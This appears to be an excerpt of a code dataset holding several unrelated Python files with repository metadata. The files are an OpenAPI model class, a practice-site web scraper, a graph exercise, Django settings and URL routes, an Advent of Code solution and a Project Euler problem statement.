'formal_expression': 'list[ODMcomplexTypeDefinitionFormalExpression]',
'alias': 'list[ODMcomplexTypeDefinitionAlias]',
'oid': 'str',
'name': 'str',
'type': 'str'
}
attribute_map = {
'description': 'description',
'formal_expression': 'formalExpression',
'alias': 'alias',
'oid': 'oid',
'name': 'name',
'type': 'type'
}
def __init__(self, description=None, formal_expression=None, alias=None, oid=None, name=None, type=None, local_vars_configuration=None): # noqa: E501
"""ODMcomplexTypeDefinitionMethodDef - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._formal_expression = None
self._alias = None
self._oid = None
self._name = None
self._type = None
self.discriminator = None
self.description = description
if formal_expression is not None:
self.formal_expression = formal_expression
if alias is not None:
self.alias = alias
if oid is not None:
self.oid = oid
if name is not None:
self.name = name
if type is not None:
self.type = type
@property
def description(self):
"""Gets the description of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The description of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: ODMcomplexTypeDefinitionDescription
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this ODMcomplexTypeDefinitionMethodDef.
:param description: The description of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: ODMcomplexTypeDefinitionDescription
"""
if self.local_vars_configuration.client_side_validation and description is None: # noqa: E501
raise ValueError("Invalid value for `description`, must not be `None`") # noqa: E501
self._description = description
@property
def formal_expression(self):
"""Gets the formal_expression of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The formal_expression of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: list[ODMcomplexTypeDefinitionFormalExpression]
"""
return self._formal_expression
@formal_expression.setter
def formal_expression(self, formal_expression):
"""Sets the formal_expression of this ODMcomplexTypeDefinitionMethodDef.
:param formal_expression: The formal_expression of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: list[ODMcomplexTypeDefinitionFormalExpression]
"""
self._formal_expression = formal_expression
@property
def alias(self):
"""Gets the alias of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The alias of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: list[ODMcomplexTypeDefinitionAlias]
"""
return self._alias
@alias.setter
def alias(self, alias):
"""Sets the alias of this ODMcomplexTypeDefinitionMethodDef.
:param alias: The alias of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: list[ODMcomplexTypeDefinitionAlias]
"""
self._alias = alias
@property
def oid(self):
"""Gets the oid of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The oid of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: str
"""
return self._oid
@oid.setter
def oid(self, oid):
"""Sets the oid of this ODMcomplexTypeDefinitionMethodDef.
:param oid: The oid of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: str
"""
self._oid = oid
@property
def name(self):
"""Gets the name of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The name of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ODMcomplexTypeDefinitionMethodDef.
:param name: The name of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: str
"""
self._name = name
@property
def type(self):
"""Gets the type of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:return: The type of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ODMcomplexTypeDefinitionMethodDef.
:param type: The type of this ODMcomplexTypeDefinitionMethodDef. # noqa: E501
:type: str
"""
allowed_values = ["COMPUTATION", "IMPUTATION", "TRANSPOSE", "OTHER"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ODMcomplexTypeDefinitionMethodDef):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ODMcomplexTypeDefinitionMethodDef):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
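A minimal usage sketch for the generated model above; the field values and the description object are invented for illustration, not taken from the rcc-client repo:

# Hypothetical usage of ODMcomplexTypeDefinitionMethodDef; values are made up.
from rcc.models.od_mcomplex_type_definition_method_def import ODMcomplexTypeDefinitionMethodDef

description = ...  # stand-in for an ODMcomplexTypeDefinitionDescription instance

method = ODMcomplexTypeDefinitionMethodDef(
    description=description,   # required: the setter rejects None when validation is on
    oid="MD.1",
    name="Derive age",
    type="COMPUTATION",         # one of COMPUTATION, IMPUTATION, TRANSPOSE, OTHER
)
print(method.to_dict())         # nested models are serialized recursively
# method.type = "GUESS"         # would raise ValueError under client_side_validation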
95edf831f37b676ba3fb2731a59d15664766b478 | 3c099a78896ca4b775d28fccf38c2bfdf6a1a555 | /zMiscellaneous/WebScraping/ScrapingEcommerce.py | 91e6ae08778622a1632ba801532cb50101916bff | [] | no_license | anmolparida/selenium_python | db21215837592dbafca5cced7aecb1421395ed41 | 78aec8bf34d53b19fb723a124ad13342c6ce641c | refs/heads/master | 2022-12-03T23:52:32.848674 | 2020-08-30T19:26:30 | 2020-08-30T19:26:30 | 282,207,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | import requests
from bs4 import BeautifulSoup
# Getting Value from the First Page
url = 'https://scrapingclub.com/exercise/list_basic/?page=1'
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
items = soup.find_all('div', class_='col-lg-4 col-md-6 mb-4')
count = 0
for i in items:
itemName = i.find('h4', class_='card-title').text.strip('\n')
itemPrice = i.find('h5').text
count = count + 1
print(str(count) + '. itemPrice: ' + itemPrice, 'itemName: ' + itemName)
# Getting Values from All the Pages
pages = soup.find('ul', class_='pagination')
urls = []
links = pages.find_all('a', class_='page-link')
for link in links:
pageNum = int(link.text) if link.text.isdigit() else None
if pageNum is not None:
x = link.get('href')
urls.append(x)
print(urls)
print('\nGetting Values from All the Pages')
count = 0
baseURL = 'https://scrapingclub.com/exercise/list_basic/'
for href in urls:
    # Join each relative href (e.g. '?page=2') onto the bare listing URL;
    # appending it to `url` would produce '...?page=1?page=2'.
    newURL = baseURL + href
    response = requests.get(newURL)
    soup = BeautifulSoup(response.text, 'lxml')
    items = soup.find_all('div', class_='col-lg-4 col-md-6 mb-4')
    for item in items:
        itemName = item.find('h4', class_='card-title').text.strip('\n')
        itemPrice = item.find('h5').text
        count = count + 1
        print(str(count) + '. itemPrice: ' + itemPrice, 'itemName: ' + itemName) | [
"[email protected]"
] | |
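For reference, a more defensive spelling of the pagination loop above, assuming the same page markup; urljoin resolves relative hrefs such as '?page=2' against the listing URL instead of concatenating strings:

from urllib.parse import urljoin

import requests
from bs4 import BeautifulSoup

listing = 'https://scrapingclub.com/exercise/list_basic/'
soup = BeautifulSoup(requests.get(listing).text, 'lxml')

# Deduplicate the numbered page links and resolve them against the listing URL.
page_urls = {urljoin(listing, a['href'])
             for a in soup.select('ul.pagination a.page-link')
             if a.text.strip().isdigit()}

for page_url in sorted(page_urls):
    page = BeautifulSoup(requests.get(page_url).text, 'lxml')
    for card in page.select('div.col-lg-4.col-md-6.mb-4'):
        print(card.h5.text, card.h4.text.strip())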
6bdee705a979426573bc0d836de6cc21f8c69502 | a14dd601cde67f67d0ba38dfd1362f7c0109cef1 | /graphs/past/perfect-friends.py | 84d3237c7bc95823da7474a6ccbd297330ad8192 | [] | no_license | Meaha7/dsa | d5ea1615f05dae32671af1f1c112f0c759056473 | fa80219ff8a6f4429fcf104310f4169d007af712 | refs/heads/main | 2023-09-03T18:52:41.950294 | 2021-11-05T09:14:42 | 2021-11-05T09:14:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | from collections import defaultdict
from graphs.util import build
def dfs(graph, src, vis):
vis.add(src)
count = 1
for nbr in graph[src]:
if nbr not in vis:
count += dfs(graph, nbr, vis)
return count
def main(edges):
    graph, vis = build(edges), set()
    csl = []  # connected-component sizes
    for src in graph.keys():
        if src not in vis:
            csl.append(dfs(graph, src, vis))
    # each component pairs its members with every member of the later components
    return sum([csl[i] * sum(csl[i + 1:]) for i in range(len(csl))])
for edges in [
[(0, 1), (2, 3), (4, 5), (5, 6), (4, 6)]
]:
print(main(edges))
| [
"[email protected]"
] | |
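The build helper imported above is not part of this file; a self-contained stand-in, assuming it returns an undirected adjacency map, plus the expected result for the sample edges:

# Assumed shape of graphs.util.build: an undirected adjacency map.
from collections import defaultdict

def build(edges):
    graph = defaultdict(list)
    for u, v in edges:
        graph[u].append(v)
        graph[v].append(u)
    return graph

# The sample edges above give component sizes [2, 2, 3],
# so main(...) returns 2*(2+3) + 2*3 = 16 cross-component pairs.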
d47d43472d31e0e542659aeb3cc520cb97087223 | 1643a5a0d1acd3bdc851718c223ba0b14bbec1c3 | /backend/rn_push_notificatio_27417/settings.py | 0f648a30594df5a74b623cf3269344d5cfcda383 | [] | no_license | crowdbotics-apps/rn-push-notificatio-27417 | 90c614ad558b2810e2b2cfe55e2dae7b97f1359e | ea9c37615be4e9e872a63d226562e4ca7bc2b6c5 | refs/heads/master | 2023-05-23T06:29:28.261563 | 2021-05-27T12:29:04 | 2021-05-27T12:29:04 | 370,993,920 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,141 | py | """
Django settings for rn_push_notificatio_27417 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rn_push_notificatio_27417.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rn_push_notificatio_27417.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
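With FCM_SERVER_KEY configured, registered devices can be messaged through fcm_django; a sketch assuming the pre-1.0 fcm_django queryset API (send_message with title/body kwargs), which a 2021-era project like this most likely targets:

# Hypothetical helper; fcm_django's pre-1.0 API is assumed here.
from fcm_django.models import FCMDevice

def notify_user(user, title, body):
    devices = FCMDevice.objects.filter(user=user, active=True)
    devices.send_message(title=title, body=body)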
919204b02732c69b3cdce838f4f06670d71c72c5 | 5c5e7b03c3373e6217665842f542ca89491290ff | /2015/day25.py | cb3f0bf727f854fd9f2f893b07c4884439f6ee3e | [] | no_license | incnone/AdventOfCode | 9c35214e338e176b6252e52a25a0141a01e290c8 | 29eac5d42403141fccef3c3ddbb986e01c89a593 | refs/heads/master | 2022-12-21T21:54:02.058024 | 2022-12-15T17:33:58 | 2022-12-15T17:33:58 | 229,338,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from getinput import get_input
from util import ncr
def get_idx(row, col):
    # 1-based position of (row, col) in the diagonal fill order:
    # (1,1)=1, (2,1)=2, (1,2)=3, (3,1)=4, ... The first row+col-2 full
    # diagonals hold ncr(row+col-1, 2) entries; col more steps reach the cell.
    if row == col == 1:
        return 1
    return ncr(row+col-1, 2) + col
def get_val(row, col):
mod = 33554393
rat = 252533
startval = 20151125
return startval*pow(rat, get_idx(row, col)-1, mod) % mod
def parse_input(s):
    # The puzzle input ends "... row R, column C.", so the last word is the
    # column and the third-from-last is the row; returned as (col, row).
    words = s.split()
    return int(words[-1].rstrip('.')), int(words[-3].rstrip(','))
def part_1(row, col):
return get_val(row, col)
if __name__ == "__main__":
the_col, the_row = parse_input(get_input(25))
print(the_row, the_col)
print('Part 1:', part_1(the_row, the_col))
| [
"[email protected]"
] | |
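A quick sanity check of the indexing and the modular-exponentiation step against the example grid in the 2015 day 25 puzzle statement:

# Expected values come from the puzzle's published example table.
assert get_idx(1, 1) == 1
assert get_idx(2, 1) == 2 and get_idx(1, 2) == 3
assert get_idx(4, 2) == 12
assert get_val(1, 1) == 20151125
assert get_val(2, 1) == 31916031
assert get_val(1, 2) == 18749137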
5bb05fab43f5353a702c4e9a5694f8f08030eda9 | c74f234dc478b49f367106b414df2473ac35b93c | /mysite/polls/urls.py | 5c7dd5797f18fd2607e2b916de5c2ac36d13007c | [] | no_license | Richiewong07/Django | 05994f552cea2cb612c6c1957a0a9a39605fdf5c | 09ac06a60c623d79bb8ecafd014ac7dbc74e8535 | refs/heads/master | 2021-04-15T14:00:00.394201 | 2018-03-24T00:34:15 | 2018-03-24T00:34:15 | 126,238,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | from django.conf.urls import url
from . import views
urlpatterns = [
# r'^$' MEANS DON'T ADD ANYTHING TO OUR URL
# views.index IS WHAT YOU WANT TO DISPLAY
# 127.0.0.1/polls/
url(r'^$', views.index, name="index"),
# SET QUESTION_ID TO A NUMBER
# 127.0.0.1/polls/1
url(r'^(?P<question_id>[0-9]+)/$', views.detail, name="detail"),
# 127.0.0.1/polls/1/results
url(r'^(?P<question_id>[0-9]+)/results$', views.results, name="results"),
# 127.0.0.1/polls/1/votes
url(r'^(?P<question_id>[0-9]+)/vote$', views.vote, name="vote"),
]
app_name = 'polls' | [
"[email protected]"
] | |
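The four names referenced by urlpatterns resolve to view callables; a minimal sketch of the matching signatures (bodies are placeholders, not from this repo):

# Hypothetical polls/views.py matching the URL names above.
from django.http import HttpResponse

def index(request):
    return HttpResponse("latest questions")

def detail(request, question_id):
    return HttpResponse("details for question %s" % question_id)

def results(request, question_id):
    return HttpResponse("results for question %s" % question_id)

def vote(request, question_id):
    return HttpResponse("vote on question %s" % question_id)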
7b76e148b73b644e42f7a1abb259e77dad11fdcc | 4f4c2e5a8a71a2058069b90eb75e11b1ec80efa9 | /euler/Problem_38-Pandigital_multiples.py | 3b25e4c08a2411b5567f23fe50c40e8e254addf0 | [] | no_license | mingyyy/dataquest_projects | 20e234f1d0d3dd8be1f0202b7ed3bce172474e38 | 885ffe4338300cb9c295f37f6140c50ff3b72186 | refs/heads/master | 2022-12-11T17:25:44.053404 | 2020-01-10T09:24:28 | 2020-01-10T09:24:28 | 190,170,724 | 0 | 0 | null | 2022-12-08T05:55:21 | 2019-06-04T09:29:53 | Jupyter Notebook | UTF-8 | Python | false | false | 525 | py | """
Take the number 192 and multiply it by each of 1, 2, and 3:
    192 x 1 = 192
    192 x 2 = 384
    192 x 3 = 576
By concatenating each product we get the 1 to 9 pandigital, 192384576. We will call 192384576 the concatenated product of 192 and (1,2,3).
The same can be achieved by starting with 9 and multiplying by 1, 2, 3, 4, and 5, giving the pandigital, 918273645, which is the concatenated product of 9 and (1,2,3,4,5).
What is the largest 1 to 9 pandigital 9-digit number that can be formed as the concatenated product of an integer with (1,2, ... , n) where n > 1?
""" | [
"[email protected]"
] |
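The file stops at the problem statement; one way to complete it. With n >= 2 the fixed part has at most four digits, so a brute force over k < 10000 suffices (a sketch, not the repo's own solution):

# Brute-force sketch for Problem 38; not part of the original file.
def largest_pandigital_multiple():
    best = 0
    for k in range(1, 10000):      # n >= 2 caps the fixed part at 4 digits
        digits, n = '', 0
        while len(digits) < 9:
            n += 1
            digits += str(k * n)
        if n >= 2 and len(digits) == 9 and set(digits) == set('123456789'):
            best = max(best, int(digits))
    return best

print(largest_pandigital_multiple())   # 932718654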